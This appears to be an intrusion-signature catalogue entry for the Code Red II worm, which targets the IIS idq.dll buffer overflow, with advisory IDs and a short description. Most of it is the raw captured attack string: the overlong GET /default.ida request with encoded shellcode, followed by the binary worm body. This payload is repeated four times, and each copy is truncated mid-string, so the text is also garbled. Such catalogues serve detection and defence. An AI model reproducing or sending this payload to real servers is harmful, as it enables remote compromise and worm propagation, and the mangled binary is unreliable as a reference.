Code-red
Against
IIS on Windows
IDs
CERT-Advisory: CA-2001-13
Microsoft: MS01-033
Bugtraq: 2880
CVE: CAN-2001-0500Buffer overflow
Effect
Remote access
Source
Captured with snort
Description
An unchecked buffer in idq.dll allows execution of arbitrary code.
Attack string
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
ÈÈ��`è����Ìëþdgÿ6��dg‰&��èß���h����…\þÿÿPÿUœ…\þÿÿPÿU˜‹@�‹�‰XþÿÿÿUä=�����”Á=�����”Å
Í�¶É‰Tþÿÿ‹u�~0š����„Ä���ÇF0š���è
���CodeRedII�‹�$ÿUØf�À�•…8þÿÿÇ…Pþÿÿ����j�…PþÿÿP…8þÿÿP‹E�ÿp�ÿ„���€½8þÿÿ�thSÿUÔÿUì�E„i½Tþÿÿ,���Ç,���èÒ���÷Ð�¯Ç‰F4EˆPj�ÿu�è����é�ÿÿÿj�j�ÿUðPÿUÐOuÒè;���i½Tþÿÿ�\&�Ç�\&�WÿUèj�j�ÿUŒjÿÿUèëù‹F4)E„jdÿUè…<þÿÿPÿUÀ�·…<þÿÿ=Ò���sÏ�·…>þÿÿƒø
sÃfÇ…pÿÿÿ��fÇ…rÿÿÿ�Pèd���‰tÿÿÿj�j�j�ÿU¸ƒøÿtò‰E€j�Th~f�€ÿu€ÿU¤Yj�…pÿÿÿPÿu€ÿU°»�����ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ����‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�j�ÿU “j�Th~f�€ÿu€ÿU¤Yƒû�u1è����X-Ó���j�hê���Pÿu€ÿU¬=ê���u�j�j�…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ����û���xu�»��ð¿`è����‹d$�dg���XaëÙdgÿ6��dg‰&��f;MZuã‹K<<�PE��u׋T�x�Ó‹B�<�KERNuÅ|��EL32u»3ÉI‹r �óüA<�GetPuõ|��rocAuë�J�IÑá�J$�·��Áá��J�‹���ÉD$$dg���XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè����Sleep�ÿuüÿUø‰Eèè����GetSystemDefaultLangID�ÿuüÿUø‰Eäè����GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè����GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
ÈÈ��`è����Ìëþdgÿ6��dg‰&��èß���h����…\þÿÿPÿUœ…\þÿÿPÿU˜‹@�‹�‰XþÿÿÿUä=�����”Á=�����”Å
Í�¶É‰Tþÿÿ‹u�~0š����„Ä���ÇF0š���è
���CodeRedII�‹�$ÿUØf�À�•…8þÿÿÇ…Pþÿÿ����j�…PþÿÿP…8þÿÿP‹E�ÿp�ÿ„���€½8þÿÿ�thSÿUÔÿUì�E„i½Tþÿÿ,���Ç,���èÒ���÷Ð�¯Ç‰F4EˆPj�ÿu�è����é�ÿÿÿj�j�ÿUðPÿUÐOuÒè;���i½Tþÿÿ�\&�Ç�\&�WÿUèj�j�ÿUŒjÿÿUèëù‹F4)E„jdÿUè…<þÿÿPÿUÀ�·…<þÿÿ=Ò���sÏ�·…>þÿÿƒø
sÃfÇ…pÿÿÿ��fÇ…rÿÿÿ�Pèd���‰tÿÿÿj�j�j�ÿU¸ƒøÿtò‰E€j�Th~f�€ÿu€ÿU¤Yj�…pÿÿÿPÿu€ÿU°»�����ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ����‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�j�ÿU “j�Th~f�€ÿu€ÿU¤Yƒû�u1è����X-Ó���j�hê���Pÿu€ÿU¬=ê���u�j�j�…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ����û���xu�»��ð¿`è����‹d$�dg���XaëÙdgÿ6��dg‰&��f;MZuã‹K<<�PE��u׋T�x�Ó‹B�<�KERNuÅ|��EL32u»3ÉI‹r �óüA<�GetPuõ|��rocAuë�J�IÑá�J$�·��Áá��J�‹���ÉD$$dg���XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè����Sleep�ÿuüÿUø‰Eèè����GetSystemDefaultLangID�ÿuüÿUø‰Eäè����GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè����GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
ÈÈ��`è����Ìëþdgÿ6��dg‰&��èß���h����…\þÿÿPÿUœ…\þÿÿPÿU˜‹@�‹�‰XþÿÿÿUä=�����”Á=�����”Å
Í�¶É‰Tþÿÿ‹u�~0š����„Ä���ÇF0š���è
���CodeRedII�‹�$ÿUØf�À�•…8þÿÿÇ…Pþÿÿ����j�…PþÿÿP…8þÿÿP‹E�ÿp�ÿ„���€½8þÿÿ�thSÿUÔÿUì�E„i½Tþÿÿ,���Ç,���èÒ���÷Ð�¯Ç‰F4EˆPj�ÿu�è����é�ÿÿÿj�j�ÿUðPÿUÐOuÒè;���i½Tþÿÿ�\&�Ç�\&�WÿUèj�j�ÿUŒjÿÿUèëù‹F4)E„jdÿUè…<þÿÿPÿUÀ�·…<þÿÿ=Ò���sÏ�·…>þÿÿƒø
sÃfÇ…pÿÿÿ��fÇ…rÿÿÿ�Pèd���‰tÿÿÿj�j�j�ÿU¸ƒøÿtò‰E€j�Th~f�€ÿu€ÿU¤Yj�…pÿÿÿPÿu€ÿU°»�����ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ����‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�j�ÿU “j�Th~f�€ÿu€ÿU¤Yƒû�u1è����X-Ó���j�hê���Pÿu€ÿU¬=ê���u�j�j�…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ����û���xu�»��ð¿`è����‹d$�dg���XaëÙdgÿ6��dg‰&��f;MZuã‹K<<�PE��u׋T�x�Ó‹B�<�KERNuÅ|��EL32u»3ÉI‹r �óüA<�GetPuõ|��rocAuë�J�IÑá�J$�·��Áá��J�‹���ÉD$$dg���XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè����Sleep�ÿuüÿUø‰Eèè����GetSystemDefaultLangID�ÿuüÿUø‰Eäè����GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè����GlobGET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
Content-type: text/xml
Content-length: 3379
ÈÈ��`è����Ìëþdgÿ6��dg‰&��èß���h����…\þÿÿPÿUœ…\þÿÿPÿU˜‹@�‹�‰XþÿÿÿUä=�����”Á=�����”Å
Í�¶É‰Tþÿÿ‹u�~0š����„Ä���ÇF0š���è
���CodeRedII�‹�$ÿUØf�À�•…8þÿÿÇ…Pþÿÿ����j�…PþÿÿP…8þÿÿP‹E�ÿp�ÿ„���€½8þÿÿ�thSÿUÔÿUì�E„i½Tþÿÿ,���Ç,���èÒ���÷Ð�¯Ç‰F4EˆPj�ÿu�è����é�ÿÿÿj�j�ÿUðPÿUÐOuÒè;���i½Tþÿÿ�\&�Ç�\&�WÿUèj�j�ÿUŒjÿÿUèëù‹F4)E„jdÿUè…<þÿÿPÿUÀ�·…<þÿÿ=Ò���sÏ�·…>þÿÿƒø
sÃfÇ…pÿÿÿ��fÇ…rÿÿÿ�Pèd���‰tÿÿÿj�j�j�ÿU¸ƒøÿtò‰E€j�Th~f�€ÿu€ÿU¤Yj�…pÿÿÿPÿu€ÿU°»�����ÀtK3ÛÿU”=3'��u?Ç…hÿÿÿ
���Ç…lÿÿÿ����Ç…`ÿÿÿ����‹E€‰…dÿÿÿ…hÿÿÿPj�…`ÿÿÿPj�j�ÿU “j�Th~f�€ÿu€ÿU¤Yƒû�u1è����X-Ó���j�hê���Pÿu€ÿU¬=ê���u�j�j�…\þÿÿPÿu€ÿU¨ÿu€ÿU´éçþÿÿ»��ßwÃ����û���xu�»��ð¿`è����‹d$�dg���XaëÙdgÿ6��dg‰&��f;MZuã‹K<<�PE��u׋T�x�Ó‹B�<�KERNuÅ|��EL32u»3ÉI‹r �óüA<�GetPuõ|��rocAuë�J�IÑá�J$�·��Áá��J�‹���ÉD$$dg���XaÃèQÿÿÿ‰]ü‰Eøè
���LoadLibraryA�ÿuüÿUø‰Eôè
���CreateThread�ÿuüÿUø‰Eðè
���GetTickCount�ÿuüÿUø‰Eìè����Sleep�ÿuüÿUø‰Eèè����GetSystemDefaultLangID�ÿuüÿUø‰Eäè����GetSystemDirectoryA�ÿuüÿUø‰Eàè
���CopyFileA�ÿuüÿUø‰EÜè����Glob
Attack program source
None available.